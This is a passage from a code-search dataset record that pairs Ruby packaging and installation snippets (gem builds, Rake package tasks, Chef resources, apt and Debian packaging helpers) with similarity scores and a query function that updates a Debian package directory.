FileUtils.cd(gem_pkg_dir) do\n if package = Dir[File.join(gem_pkg_dir, \"#{gem_name}-*.gem\")].last\n # If the (meta) gem has it's own package, install it.\n install_gem(File.basename(package), options.dup)\n else\n # Otherwise install each package seperately.\n Dir[\"*.gem\"].each { |gem| install_gem(gem, options.dup) }\n end\n end\n return true\n end\n end\n end\n raise Gem::InstallError, \"No Rakefile found for #{gem_name}\"\n end",
"def tailor_package_to_platform\n @package.app('Dropbox')\n @package.volumes_dir('Dropbox Installer')\n @package.source(URI.encode(\"file://#{download_dest}\"))\n end",
"def package_common(package_type, spec, &block)\n package_name = Autoproj.package_name_from_options(spec)\n\n if Autobuild::Package[package_name]\n current_file = Autoproj.current_file[1]\n old_file = Autoproj.workspace.manifest.definition_file(package_name)\n Autoproj.warn \"#{package_name} from #{current_file} is overridden by the definition in #{old_file}\"\n\n return Autobuild::Package[package_name]\n end\n\n pkg = Autoproj.define(package_type, spec, &block)\n pkg.srcdir = pkg.name\n pkg\nend",
"def package_dir\n config.package_dir\n end",
"def package_build!(tmp_dir)\n # copying template files\n FileUtils.cp_r(File.expand_path(File.join(File.dirname(__FILE__), \"debian\")), tmp_dir)\n Dir.chdir(tmp_dir) do\n ppath = File.join(\"..\", self.package_filename)\n File.delete(ppath) if File.exists? ppath\n deb_files = File.join(\"..\", \"#{@package.name}_#{@package.version}*\")\n res = run_dpkg tmp_dir, @package.gpg_key \n if res or File.exists? ppath \n # mv can raise\n FileUtils.mv(Dir.glob(deb_files) , @dest_dir, :force => true)\n else\n ActiveRecord::Base.logger.debug \"Dpkg-buildpackage failed\"\n raise \"dpkg-buildpackage failed\"\n end\n end\n end",
"def manual_package_install(pkg_dependencies=[])\n\n unless pkg_dependencies.nil?\n pkg_dependencies.each do |pkg|\n\n if pkg =~ /\\.rpm/\n filename = $1 if pkg =~ /\\/(\\w+[a-zA-Z0-9\\-\\_\\.]+\\.rpm)\\z/\n p \"FILENAME: #{filename}\"\n remote_file \"#{Chef::Config[:file_cache_path]}/#{filename}\" do\n source \"#{pkg}\"\n action :create_if_missing\n end\n end\n\n package pkg do\n action :install\n if pkg =~ /\\.rpm/\n source \"#{Chef::Config[:file_cache_path]}/#{filename}\"\n provider Chef::Provider::Package::Rpm\n end\n end\n\n end\n end\n\nend",
"def add_bundle(sourcefile, params={})\n classname = File.basename(sourcefile, \".java\")\n pkgline = `grep ^package #{sourcefile}`\n if !pkgline or pkgline == \"\"\n raise \"the searcher file (#{sourcefile}) must contain a package declaration\"\n end\n pkgpath = pkgline.split()[1].chop;\n add_bundle_dir(sourcefile, pkgpath + \".\" + classname, params)\n end",
"def define\n fail \"Version required (or :noversion)\" if @version.nil?\n @version = nil if :noversion == @version\n\n desc \"Build all the packages\"\n task :package\n\n desc \"Force a rebuild of the package files\"\n task repackage: [:clobber_package, :package]\n\n desc \"Remove package products\"\n task :clobber_package do\n rm_r package_dir rescue nil\n end\n\n task clobber: [:clobber_package]\n\n [\n [need_tar, tgz_file, \"z\"],\n [need_tar_gz, tar_gz_file, \"z\"],\n [need_tar_bz2, tar_bz2_file, \"j\"],\n [need_tar_xz, tar_xz_file, \"J\"]\n ].each do |need, file, flag|\n if need\n task package: [\"#{package_dir}/#{file}\"]\n file \"#{package_dir}/#{file}\" =>\n [package_dir_path] + package_files do\n chdir(working_dir) { sh @tar_command, \"#{flag}cvf\", file, target_dir }\n mv \"#{package_dir_path}/#{target_dir}\", package_dir if without_parent_dir\n end\n end\n end\n\n if need_zip\n task package: [\"#{package_dir}/#{zip_file}\"]\n file \"#{package_dir}/#{zip_file}\" =>\n [package_dir_path] + package_files do\n chdir(working_dir) { sh @zip_command, \"-r\", zip_file, target_dir }\n mv \"#{package_dir_path}/#{zip_file}\", package_dir if without_parent_dir\n end\n end\n\n directory package_dir_path => @package_files do\n @package_files.each do |fn|\n f = File.join(package_dir_path, fn)\n fdir = File.dirname(f)\n mkdir_p(fdir) unless File.exist?(fdir)\n if File.directory?(fn)\n mkdir_p(f)\n else\n rm_f f\n safe_ln(fn, f)\n end\n end\n end\n self\n end",
"def target_dir\n without_parent_dir ? \".\" : package_name\n end",
"def install_package host, package_name\n host.install_package package_name\n end",
"def output_package(pkg_type)\n case pkg_type\n when 'makeself'\n \"#{package_name}-#{build_version}_#{iteration}.sh\"\n when 'msi'\n Packager::WindowsMsi.new(self).package_name\n when 'bff'\n \"#{package_name}.#{bff_version}.bff\"\n when 'pkgmk'\n \"#{package_name}-#{build_version}-#{iteration}.solaris\"\n when 'mac_pkg'\n Packager::MacPkg.new(self).package_name\n when 'mac_dmg'\n pkg = Packager::MacPkg.new(self)\n Packager::MacDmg.new(pkg).package_name\n else # fpm\n require \"fpm/package/#{pkg_type}\"\n pkg = FPM::Package.types[pkg_type].new\n pkg.version = build_version\n pkg.name = package_name\n pkg.iteration = iteration\n if pkg_type == 'solaris'\n pkg.to_s('NAME.FULLVERSION.ARCH.TYPE')\n else\n pkg.to_s\n end\n end\n end",
"def metapackage(name, *packages, &block)\n meta = (@metapackages[name.to_s] ||= Metapackage.new(name))\n packages.each do |arg|\n if !arg.respond_to?(:to_str)\n meta.add(arg)\n elsif (pkg = find_autobuild_package(arg))\n meta.add(pkg)\n elsif (pkg_set = find_metapackage(arg))\n pkg_set.each_package do |pkg_in_set|\n meta.add(pkg_in_set)\n end\n elsif os_package_resolver.has?(arg)\n raise ArgumentError, \"cannot specify the osdep #{arg} as an element of a metapackage\"\n else\n raise PackageNotFound, \"cannot find a package called #{arg}\"\n end\n end\n\n meta.instance_eval(&block) if block\n meta\n end",
"def install_gem_from_source(source_dir, *args)\n installed_gems = []\n opts = args.last.is_a?(Hash) ? args.pop : {}\n Dir.chdir(source_dir) do \n gem_name = args[0] || File.basename(source_dir)\n gem_pkg_dir = File.join(source_dir, 'pkg')\n gem_pkg_glob = File.join(gem_pkg_dir, \"#{gem_name}-*.gem\")\n skip_gems = opts.delete(:skip) || []\n\n # Cleanup what's already there\n clobber(source_dir)\n FileUtils.mkdir_p(gem_pkg_dir) unless File.directory?(gem_pkg_dir)\n\n # Recursively process all gem packages within the source dir\n skip_gems << gem_name\n packages = package_all(source_dir, skip_gems)\n \n if packages.length == 1\n # The are no subpackages for the main package\n refresh = [gem_name]\n else\n # Gather all packages into the top-level pkg directory\n packages.each do |pkg|\n FileUtils.copy_entry(pkg, File.join(gem_pkg_dir, File.basename(pkg)))\n end\n \n # Finally package the main gem - without clobbering the already copied pkgs\n package(source_dir, false)\n \n # Gather subgems to refresh during installation of the main gem\n refresh = packages.map do |pkg|\n File.basename(pkg, '.gem')[/^(.*?)-([\\d\\.]+)$/, 1] rescue nil\n end.compact\n \n # Install subgems explicitly even if ignore_dependencies is set\n if opts[:ignore_dependencies]\n refresh.each do |name| \n gem_pkg = Dir[File.join(gem_pkg_dir, \"#{name}-*.gem\")][0]\n install_pkg(gem_pkg, opts)\n end\n end\n end\n \n ensure_bin_wrapper_for(opts[:install_dir], opts[:bin_dir], *installed_gems)\n \n # Finally install the main gem\n if install_pkg(Dir[gem_pkg_glob][0], opts.merge(:refresh => refresh))\n installed_gems = refresh\n else\n installed_gems = []\n end\n end\n installed_gems\n end",
"def install_gem_from_src(gem_src_dir, options = {})\n if !File.directory?(gem_src_dir)\n raise \"Missing rubygem source path: #{gem_src_dir}\"\n end\n if options[:install_dir] && !File.directory?(options[:install_dir])\n raise \"Missing rubygems path: #{options[:install_dir]}\"\n end\n\n gem_name = File.basename(gem_src_dir)\n gem_pkg_dir = File.expand_path(File.join(gem_src_dir, 'pkg'))\n\n # We need to use local bin executables if available.\n thor = \"#{Gem.ruby} -S #{which('thor')}\"\n rake = \"#{Gem.ruby} -S #{which('rake')}\"\n\n # Handle pure Thor installation instead of Rake\n if File.exists?(File.join(gem_src_dir, 'Thorfile'))\n # Remove any existing packages.\n FileUtils.rm_rf(gem_pkg_dir) if File.directory?(gem_pkg_dir)\n # Create the package.\n FileUtils.cd(gem_src_dir) { system(\"#{thor} :package\") }\n # Install the package using rubygems.\n if package = Dir[File.join(gem_pkg_dir, \"#{gem_name}-*.gem\")].last\n FileUtils.cd(File.dirname(package)) do\n install_gem(File.basename(package), options.dup)\n return true\n end\n else\n raise Gem::InstallError, \"No package found for #{gem_name}\"\n end\n # Handle elaborate installation through Rake\n else\n # Clean and regenerate any subgems for meta gems.\n Dir[File.join(gem_src_dir, '*', 'Rakefile')].each do |rakefile|\n FileUtils.cd(File.dirname(rakefile)) do \n system(\"#{rake} clobber_package; #{rake} package\")\n end\n end\n\n # Handle the main gem install.\n if File.exists?(File.join(gem_src_dir, 'Rakefile'))\n subgems = []\n # Remove any existing packages.\n FileUtils.cd(gem_src_dir) { system(\"#{rake} clobber_package\") }\n # Create the main gem pkg dir if it doesn't exist.\n FileUtils.mkdir_p(gem_pkg_dir) unless File.directory?(gem_pkg_dir)\n # Copy any subgems to the main gem pkg dir.\n Dir[File.join(gem_src_dir, '*', 'pkg', '*.gem')].each do |subgem_pkg|\n if name = File.basename(subgem_pkg, '.gem')[/^(.*?)-([\\d\\.]+)$/, 1]\n subgems << name\n end\n dest = File.join(gem_pkg_dir, File.basename(subgem_pkg))\n FileUtils.copy_entry(subgem_pkg, dest, true, false, true) \n end\n\n # Finally generate the main package and install it; subgems\n # (dependencies) are local to the main package.\n FileUtils.cd(gem_src_dir) do \n system(\"#{rake} package\")\n FileUtils.cd(gem_pkg_dir) do\n if package = Dir[File.join(gem_pkg_dir, \"#{gem_name}-*.gem\")].last\n # If the (meta) gem has it's own package, install it.\n install_gem(File.basename(package), options.merge(:refresh => subgems))\n else\n # Otherwise install each package seperately.\n Dir[\"*.gem\"].each { |gem| install_gem(gem, options.dup) }\n end\n end\n return true\n end\n end\n end\n raise Gem::InstallError, \"No Rakefile found for #{gem_name}\"\n end",
"def source_package_file\n pkg_file = nil\n pkg_dir = self.source_package_dir\n @source_urls.each do |url|\n poss_pkg_file = File.join(pkg_dir, File.basename(url[0]))\n if File::exists?(poss_pkg_file)\n pkg_file = poss_pkg_file\n break\n end\n end\n pkg_file\n end",
"def source_package_file\n pkg_file = nil\n pkg_dir = self.source_package_dir\n @source_urls.each do |url|\n poss_pkg_file = File.join(pkg_dir, File.basename(url[0]))\n if File::exists?(poss_pkg_file)\n pkg_file = poss_pkg_file\n break\n end\n end\n pkg_file\n end",
"def before_package_create(package)\n end",
"def before_package_create(package)\n end",
"def package(cookbook, destination)\n cookbooks[cookbook] ||= {}\n cookbooks[cookbook][:destination] = destination\n end",
"def gemfile spec, source, destination = nil\n destination ||= File.expand_path \".\"\n\n require \"rubygems/builder\"\n\n Dir.chdir source do\n FileUtils.mv Gem::Builder.new(spec).build, destination\n end\n\n destination\n end",
"def pkg_cmd; \"#{pkg_binary}\" end",
"def create_packages\n gem 'fpm', '= 0.4.3'\n require 'fpm'\n\n @package.packagedata.each do |type, data|\n next unless data\n @tmpdir = Dir.mktmpdir(\"mcollective_packager\")\n @workingdir = File.join(@tmpdir, @libdir)\n FileUtils.mkdir_p @workingdir\n prepare_tmpdirs data\n create_package type, data\n cleanup_tmpdirs\n end\n end",
"def package(destination)\n output[:messages] << \"Cookbook(s) packaged to #{destination}\"\n end",
"def do_dmg_package_resource!\n dmg_package 'Chef Development Kit' do\n app dmg_package_app\n volumes_dir 'Chef Development Kit'\n source dmg_package_source\n type 'pkg'\n package_id 'com.getchef.pkg.chefdk'\n checksum dmg_package_checksum\n end\n end",
"def add_packaged_app(&block)\n raise Tay::InvalidSpecification.new('Packaged app already set up') if @packaged_app\n @packaged_app = PackagedApp.new\n yield @packaged_app\n end",
"def package(*patterns)\n install_package_matching patterns\n end",
"def initialize(namespace, name, source, options={})\n raise \"Package source root '#{source}' is not a directory\" unless File.directory? source\n\n @namespace = namespace.to_s.freeze\n @name = name.to_s.freeze\n @source = Pathname.new(source).freeze\n @dest = Pathname.new(options[:into] || \"\").freeze\n @active = !!(options[:default] || options[:when])\n\n # Special case user@host packages.\n if name =~ /([^@]*)@(.*)/\n hostname = %x{hostname}.chomp\n hostnames = [hostname, hostname.split('.').first]\n user_match = $1.empty? || (ENV['USER'] == $1)\n host_match = $2.empty? || (hostnames.include? $2)\n @active = true if user_match && host_match\n end\n\n @links = { }\n populate_links do |path|\n if options[:dotfiles] == true\n \".#{path.basename}\" if path.parent == @source\n elsif options[:dotfiles].kind_of? Array\n relpath = path.relative_path_from(@source)\n \".#{path.basename}\" if options[:dotfiles].include? relpath.to_s\n end\n end\n @links.freeze\n end",
"def packages\n manifest.each_with_object({}) do |(src, package_name), hsh|\n next if src.nil? || src.empty?\n hsh[package_name] ||= []\n hsh[package_name] << File.join(Licensed::Git.repository_root, src)\n end\n end",
"def install_go_source\n source = \"go#{GO_VERSION}.src.tar.gz\"\n bootstrap = \"go1.4-bootstrap-20161024.tar.gz\"\n\n <<-SCRIPT\n mkdir -p /usr/local/go/bootstrap\n #{wget(bootstrap)}\n tar -C /usr/local/go/bootstrap -xzf #{bootstrap}\n bash -c \"cd /usr/local/go/bootstrap/go/src && ./make.bash\"\n\n #{wget(source)}\n tar -C /usr/local -xzf #{source}\n bash -c \"cd /usr/local/go/src && GOROOT_BOOTSTRAP=/usr/local/go/bootstrap/go ./make.bash\"\n SCRIPT\nend",
"def to_package\n package = Package.new(root)\n package.name = name\n package.version = version\n package.date = released\n package.path = loadpath\n package\n end",
"def dmg_package_source\n if %i(direct repo).include?(new_resource.source)\n return package_metadata[:url]\n end\n path = new_resource.source.to_s\n (path.start_with?('/') ? 'file://' : '') + path\n end",
"def create_arch_package(arch, arch_dir, src_dir, out_dir, pack_config)\n # Load manifest\n manifest = YAML.load_file(\"#{src_dir}/manifest.yaml\")\n manifest['arch'] = arch\n name = manifest['name']\n version = manifest['version']\n info \"Packing #{src_dir} (#{arch})\"\n\n npk = \"#{out_dir}/#{name}-#{arch}-#{version}.npk\"\n\n # TODO: do this seperatly\n # Remove existing containers\n Dir.glob(\"#{out_dir}/#{name}-#{arch}-*\").each { |c| FileUtils.rm(c, :verbose => false) }\n\n create_npk(src_dir, npk, manifest, arch_dir, pack_config)\n\n # Update/Create version list\n version_info_path = File.join(out_dir, \"packages-#{arch}.yaml\")\n update_version_list(version_info_path, name, version)\nend",
"def autotools_package(options, &block)\n package_common(:autotools, options) do |pkg|\n pkg.depends_on 'autotools'\n common_make_based_package_setup(pkg)\n yield(pkg) if block_given?\n end\nend",
"def install_custom!\n do_dmg_package_resource!\n end",
"def package(name, paths=[])\n Package.new(name, paths, self)\n end",
"def install_package(package_name, options = {})\n return true if install_package_impl(package_name, options)\n if options[:source]\n if options[:no_proxy]\n install_package package_name, options.merge(:source => false)\n else\n install_package package_name, options.merge(:no_proxy => true)\n end\n else\n return false unless options[:no_proxy]\n install_package package_name, options.merge(:no_proxy => true)\n end\n end",
"def package(pkg)\n @pkg = pkg\n end",
"def for_package(package)\n data = File.read(path_for(package))\n hash = FFI_Yajl::Parser.parse(data, symbolize_names: true)\n\n # Ensure Platform version has been truncated\n if hash[:platform_version] && hash[:platform]\n hash[:platform_version] = truncate_platform_version(hash[:platform_version], hash[:platform])\n end\n\n # Ensure an interation exists\n hash[:iteration] ||= 1\n\n new(package, hash)\n rescue Errno::ENOENT\n raise NoPackageMetadataFile.new(package.path)\n end",
"def initialize_package\n self.need_tar ||= false\n self.need_zip ||= false\n end"
] | [
"0.68598044",
"0.68513906",
"0.6561744",
"0.632393",
"0.624938",
"0.62227345",
"0.62220913",
"0.6191581",
"0.619106",
"0.61131114",
"0.6092626",
"0.60886014",
"0.6073014",
"0.60682124",
"0.602863",
"0.59846896",
"0.59642756",
"0.5947927",
"0.5936238",
"0.5925864",
"0.5917892",
"0.59172887",
"0.5885911",
"0.58814466",
"0.5873726",
"0.5854692",
"0.5843708",
"0.5841641",
"0.5814937",
"0.5802581",
"0.5800184",
"0.5793957",
"0.57910943",
"0.5789499",
"0.5774517",
"0.5774465",
"0.57543594",
"0.57416844",
"0.5738592",
"0.5734952",
"0.5706435",
"0.56966525",
"0.5672639",
"0.56600314",
"0.5650032",
"0.5648602",
"0.5648259",
"0.56444687",
"0.5637078",
"0.56324506",
"0.5626878",
"0.5614026",
"0.56119144",
"0.5606124",
"0.5605738",
"0.5598999",
"0.5589824",
"0.5577887",
"0.55711734",
"0.55428034",
"0.55377036",
"0.5530041",
"0.5528025",
"0.55213666",
"0.551394",
"0.55124646",
"0.55105585",
"0.55075145",
"0.55051285",
"0.5503124",
"0.5499832",
"0.54988843",
"0.5496894",
"0.54899454",
"0.5486019",
"0.54836154",
"0.54836154",
"0.54758364",
"0.54758364",
"0.5472895",
"0.5470351",
"0.5462277",
"0.5458934",
"0.5458794",
"0.5441396",
"0.5439586",
"0.543306",
"0.543116",
"0.5421197",
"0.54093045",
"0.54029185",
"0.54017526",
"0.53969795",
"0.5390784",
"0.5385779",
"0.5379177",
"0.53791046",
"0.5374919",
"0.5371284",
"0.5368517"
] | 0.561658 | 51 |
Update the debian directory with overlay and env.sh/env.yml | def update_debian_dir(pkginfo, options)
# Generate the debian directory
generate_debian_dir(pkginfo, pkginfo.srcdir, options)
if options[:patch_dir] && File.exist?(options[:patch_dir])
if patch_pkg_dir(pkginfo.name, options[:patch_dir],
whitelist: nil,
pkg_dir: pkginfo.srcdir,
options: patch_options())
Packager.warn "Overlay patch applied to #{pkginfo.name}"
end
Dir.chdir(pkginfo.srcdir) do
process_apaka_control("apaka.control")
end
end
dpkg_commit_changes("overlay", pkginfo.srcdir,
logfile: options[:logfile],
include_removal: true)
envyml = File.join(pkginfo.srcdir, "env.yml")
Packager.warn("Preparing env.yml #{envyml}")
patch_yml = {}
if File.exists?(envyml)
patch_yml = YAML.load_file(envyml)
end
env_data = pkginfo.generate_env_data("APAKA__" + Packaging.as_var_name(pkginfo.name), rock_install_directory, base_data: patch_yml)
File.open(envyml, "w") do |file|
file.write(env_data.to_yaml)
end
dpkg_commit_changes("envyml", pkginfo.srcdir,
logfile: options[:logfile])
envsh = File.join(pkginfo.srcdir, "env.sh")
Packager.warn("Preparing env.sh #{envsh}")
File.open(envsh, "a") do |file|
env_txt = pkginfo.envsh(env_data)
file.write(env_txt)
end
dpkg_commit_changes("envsh", pkginfo.srcdir,
logfile: options[:logfile])
# Run dpkg-source
# Use the new tar ball as source
if !system("dpkg-source", "-I", "-b", pkginfo.srcdir,
[:out, :err] => redirection(options[:logfile],"a"),
:close_others => true)
Packager.warn "Package: #{pkginfo.name} failed to perform dpkg-source -- #{Dir.entries(pkginfo.srcdir)}"
raise RuntimeError, "Debian: #{pkginfo.name} failed to perform dpkg-source in #{pkginfo.srcdir}"
end
["#{versioned_name(pkginfo, options[:distribution])}.debian.tar.gz",
"#{plain_versioned_name(pkginfo)}.orig.tar.gz",
"#{versioned_name(pkginfo, options[:distribution])}.dsc"]
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def setup debian_repository\n write_config debian_repository\n restart\n end",
"def etc_update \n announcing 'Running etc-update' do\n system(\"chroot #{$chrootdir} /scripts/run.sh update_configs\")\n end\n send_to_state('build', 'etc_update')\n end",
"def apt_update(vm)\n vm.provision \"shell\", inline: <<-SHELL\n if [ ! -f /root/apt.updated ]; then\n apt-get -y update\n apt-get -y purge exim4-* libcairo*\n apt-get -y autoremove\n #apt-get -y upgrade\n #apt-get -y dist-upgrade\n apt-get -y install htop tree vim aufs-tools screen curl\n touch /root/apt.updated\n fi\n SHELL\nend",
"def install_in_debian\n package 'apt-transport-https'\n package 'dirmngr' if get_debian_os_name == 'stretch'\n collectd_ppa_source = node['SignalFx_debian_ppa'][get_debian_os_name]['collectd']['uri']\n signalfx_collectd_plugin_ppa_source = node['SignalFx_debian_ppa'][get_debian_os_name]['collectd_plugin']['uri']\n signalfx_keyid = node['SignalFx_debian_ppa']['keyid']\n execute 'add SignalFx PPA' do\n command \"apt-key adv --keyserver keyserver.ubuntu.com --recv-keys #{signalfx_keyid} && \n echo #{collectd_ppa_source} > /etc/apt/sources.list.d/signalfx_collectd.list && \n echo #{signalfx_collectd_plugin_ppa_source} > /etc/apt/sources.list.d/signalfx_collectd_plugin.list\"\n action :run\n end\n ubuntu_update\n install_package 'collectd'\nend",
"def update_env_file!\n present_env = ssh_read_file(app_username, \"#{ app_name }/.env\").to_s\n\n env = {\n \"RAILS_ENV\" => \"production\",\n \"PATH\" => \"/home/#{ app_username }/.rvm/wrappers/#{ app_name }:$PATH\",\n \"SECRET_KEY_BASE\" => SecureRandom.hex(64),\n }.merge(\n Dotenv::Parser.call(present_env)\n ).merge(\n options[:env] || {}\n ).map { |k, v|\n \"export #{ k }=#{ v.inspect }\\n\"\n }.join(\"\")\n\n ssh_write_file(app_username, \"#{ app_name }/.env\", env)\n end",
"def apt_update(vm)\n vm.provision \"shell\", inline: <<-SHELL\n if [ ! -f /root/apt.updated ]; then\n apt-get -y update\n apt-get -y purge exim4-*\n apt-get -y autoremove\n apt-get -y upgrade\n apt-get -y dist-upgrade\n apt-get -y install htop tree vim aufs-tools\n touch /root/apt.updated\n fi\n SHELL\nend",
"def update(args)\n if (args[0] == \"dns\")\n\n if RUBY_PLATFORM.include? \"linux\"\n system('ansible-playbook /usr/local/gdev-env/ansible/ubuntu.yml -i 127.0.0.1, --ask-become-pass --verbose --tags=dns')\n else\n system('ansible-playbook /usr/local/gdev-env/ansible/mac.yml -i 127.0.0.1, --ask-become-pass --verbose --tags=dns')\n end\n\n elsif (args[0].nil?)\n\n if RUBY_PLATFORM.include? \"linux\"\n system('cd /usr/local/gdev-env && git reset HEAD --hard && git pull origin HEAD && bin/ubuntu')\n else\n system('cd /usr/local/gdev-env && git reset HEAD --hard && git pull origin HEAD && bin/bootstrap')\n end\n # Rebuild and reload all services\n puts \"Refreshing all gdev services...\"\n service(['build nginx'])\n service(['reload'])\n\n else\n puts \"Did you mean to run: $ gdev update ?\"\n end\n end",
"def apt_update\n run %{apt-get update -y}\nend",
"def update(args)\n if (args[0] == \"dns\")\n system('ansible-playbook /usr/local/gdev-env/ansible/mac.yml -i 127.0.0.1, --ask-become-pass --verbose --tags=dns')\n elsif (args[0].nil?)\n system('cd /usr/local/gdev-env && git reset HEAD --hard && git pull origin HEAD && bin/bootstrap')\n # Rebuild and reload all services\n puts \"Refreshing all gdev services...\"\n service(['build nginx'])\n service(['reload'])\n else\n puts \"Did you mean to run: $ gdev update ?\"\n end\n end",
"def mirror_env_to_profile_d env_file\n if /opensuse|sles-/.match?(self[:platform])\n @logger.debug(\"mirroring environment to /etc/profile.d on opensuse/sles platform host\")\n cur_env = exec(Beaker::Command.new(\"cat #{env_file}\")).stdout\n shell_env = ''\n cur_env.each_line do |env_line|\n shell_env << \"export #{env_line}\"\n end\n # here doc it over\n exec(Beaker::Command.new(\"cat << EOF > #{self[:profile_d_env_file]}\\n#{shell_env}EOF\"))\n # set permissions\n exec(Beaker::Command.new(\"chmod +x #{self[:profile_d_env_file]}\"))\n # keep it current\n exec(Beaker::Command.new(\"source #{self[:profile_d_env_file]}\"))\n else\n # noop\n @logger.debug(\"will not mirror environment to /etc/profile.d on non-sles platform host\")\n end\n end",
"def setup_path\n # The Java Buildpack for WLS creates the complete domain structure and other linkages during staging.\n # The directory used for staging is at /tmp/staged/app\n # But the actual DEA execution occurs at /home/vcap/app. This discrepancy can result in broken paths and non-startup of the server.\n # So create linkage from /tmp/staged/app to actual environment of /home/vcap/app when things run in real execution\n # Also, this script needs to be invoked before starting the server as it will create the links and also tweak the server args\n # (to listen on correct port, use user supplied jvm args)\n\n File.open(@application.root.to_s + '/' + SETUP_ENV_SCRIPT, 'w') do |f|\n\n f.puts '#!/bin/sh '\n f.puts '# There are 4 things handled by this script '\n f.puts ' '\n f.puts '# 1. Create links to mimic staging env and update scripts with jvm options '\n f.puts '# The Java Buildpack for WLS creates complete domain structure and other linkages during staging at '\n f.puts '# /tmp/staged/app location '\n f.puts '# But the actual DEA execution occurs at /home/vcap/app. '\n f.puts '# This discrepancy can result in broken paths and non-startup of the server. '\n f.puts '# So create linkage from /tmp/staged/app to actual environment of /home/vcap/app when things run in real execution '\n f.puts '# Create paths that match the staging env, as otherwise scripts will break!! '\n f.puts ' '\n f.puts 'if [ ! -d \\\"/tmp/staged\\\" ]; then '\n f.puts ' /bin/mkdir /tmp/staged '\n f.puts 'fi; '\n f.puts 'if [ ! -d \\\"/tmp/staged/app\\\" ]; then '\n f.puts ' /bin/ln -s `pwd` /tmp/staged/app '\n f.puts 'fi; '\n f.puts ' '\n f.puts ' '\n end\n end",
"def update_apt_if_needed\n if self['platform'] =~ /debian|ubuntu|cumulus/\n if @apt_needs_update\n execute(\"apt-get update\")\n @apt_needs_update = false\n end\n end\n end",
"def upgrade_repo!\n package 'apt-transport-https'\n include_recipe \"apt-chef::#{new_resource.channel}\"\n package('chefdk') { action :upgrade }\n end",
"def update_apt_if_needed\n if self['platform'] =~ /debian|ubuntu|cumulus|huaweios/\n if @apt_needs_update\n execute(\"apt-get update\")\n @apt_needs_update = false\n end\n end\n end",
"def update_apt\n <<~APT\n # Update apt-get\n RUN DEBIAN_FRONTEND=noninteractive apt-get update\n APT\n end",
"def reload_systemd()\n bash 'reload systemd daemon' do\n user 'root'\n code 'systemctl daemon-reload'\n end\nend",
"def install_in_ubuntu\n install_ppa(node['SignalFx_ppa']['collectd']['name'],\n node['SignalFx_ppa']['collectd']['uri'])\n install_ppa(node['SignalFx_ppa']['collectd_plugin']['name'],\n node['SignalFx_ppa']['collectd_plugin']['uri'])\n ubuntu_update\n install_package 'collectd'\nend",
"def upgrade_direct!\n package \"Chef Development Kit v#{package_metadata[:version]}\" do\n source package_metadata[:url]\n checksum package_metadata[:sha256]\n end\n end",
"def apt_get_update hosts\n block_on hosts do |host|\n host.exec(Command.new(\"apt-get update\")) if /ubuntu|debian|cumulus/.match?(host[:platform])\n end\n end",
"def setup_before_restart\n tcs_static = node['thecollegesound']['static_root']\n tcs_app = File.join(node['thecollegesound']['app_root'], 'current')\n\n # -- Link statics (css, js, basic images)\n # FIXME: Consolidate the image directories\n ['css', 'js', 'images', 'icons', 'img'].each do |dir|\n link \"#{tcs_static}/static/#{dir}\" do\n to \"#{tcs_app}/collegesound/static/#{dir}\"\n end\n end\n\n # -- Link templates\n link \"#{tcs_static}/templates\" do\n to \"#{tcs_app}/collegesound/templates\"\n end\n\n # -- Install the package\n bash 'install_package' do\n user 'root'\n cwd tcs_app\n code 'python setup.py install'\n end\n\n # -- Run migration\n bash 'run_migration' do\n user 'root'\n cwd \"#{tcs_app}/collegesound\"\n code <<-EOH\n python manage.py convert_to_south main\n python manage.py migrate main\n EOH\n end\nend",
"def install_dev_repos_on(package, host, sha, repo_configs_dir, opts={})\n platform = host['platform'] =~ /^(debian|ubuntu)/ ? host['platform'].with_version_codename : host['platform']\n platform_configs_dir = File.join(repo_configs_dir, platform)\n\n case platform\n when /^(fedora|el|centos|sles)-(\\d+)-(.+)$/\n variant = (($1 == 'centos') ? 'el' : $1)\n fedora_prefix = ((variant == 'fedora') ? 'f' : '')\n version = $2\n arch = $3\n\n pattern = 'pl-%s-%s-%s-%s%s-%s.repo'\n\n repo_filename = pattern % [\n package,\n sha,\n variant,\n fedora_prefix,\n version,\n arch\n ]\n\n repo = fetch_http_file(\n \"%s/%s/%s/repo_configs/rpm/\" % [opts[:dev_builds_url],package, sha],\n repo_filename,\n platform_configs_dir\n )\n\n if /sles/i.match(platform)\n scp_to(host, repo, '/etc/zypp/repos.d/')\n else\n scp_to(host, repo, '/etc/yum.repos.d/')\n end\n\n when /^(debian|ubuntu)-([^-]+)-(.+)$/\n variant = $1\n version = $2\n arch = $3\n\n list = fetch_http_file(\n \"%s/%s/%s/repo_configs/deb/\" % [opts[:dev_builds_url],package, sha],\n \"pl-%s-%s-%s.list\" % [package, sha, version],\n platform_configs_dir\n )\n\n scp_to host, list, '/etc/apt/sources.list.d'\n if variant == 'ubuntu' && version.split('.').first.to_i >= 18\n apt_conf_content = 'Acquire::AllowInsecureRepositories \"true\";'\n else\n apt_conf_content = 'APT::Get::AllowUnauthenticated \"true\";'\n end\n create_remote_file(host, '/etc/apt/apt.conf.d/99trust-all', apt_conf_content)\n on host, 'apt-get update'\n else\n host.logger.notify(\"No repository installation step for #{platform} yet...\")\n end\n end",
"def generate_debian_dir(pkginfo, dir, options)\n options, unknown_options = Kernel.filter_options options,\n :distribution => nil,\n :override_existing => true,\n :patch_dir => nil\n\n distribution = options[:distribution]\n\n # Prepare fields for template\n package_info = pkginfo\n debian_name = debian_name(pkginfo)\n debian_version = debian_version(pkginfo, distribution)\n versioned_name = versioned_name(pkginfo, distribution)\n short_documentation = pkginfo.short_documentation\n documentation = pkginfo.documentation\n origin_information = pkginfo.origin_information\n source_files = pkginfo.source_files\n\n upstream_name = pkginfo.name\n copyright = pkginfo.copyright\n license = pkginfo.licenses\n\n deps = @dep_manager.filtered_dependencies(pkginfo)\n\n #debian names of rock packages\n deps_rock_packages = deps[:rock]\n deps_osdeps_packages = deps[:osdeps]\n deps_nonnative_packages = deps[:nonnative].to_a.flatten.compact\n\n dependencies = (deps_rock_packages + deps_osdeps_packages + deps_nonnative_packages).flatten\n build_dependencies = dependencies.dup\n\n this_rock_release = TargetPlatform.new(rock_release_name, target_platform.architecture)\n @rock_autobuild_deps[pkginfo.build_type].each do |pkginfo|\n name = debian_name(pkginfo)\n build_dependencies << this_rock_release.packageReleaseName(name)\n end\n\n # To handle postinstall\n DEFAULT_BUILD_DEPENDENCIES.each do |dep|\n build_dependencies << dep\n end\n\n DEFAULT_RUNTIME_DEPENDENCIES.each do |dep|\n dependencies << dep\n end\n\n if pkginfo.build_type == :cmake\n build_dependencies << \"cmake\"\n elsif 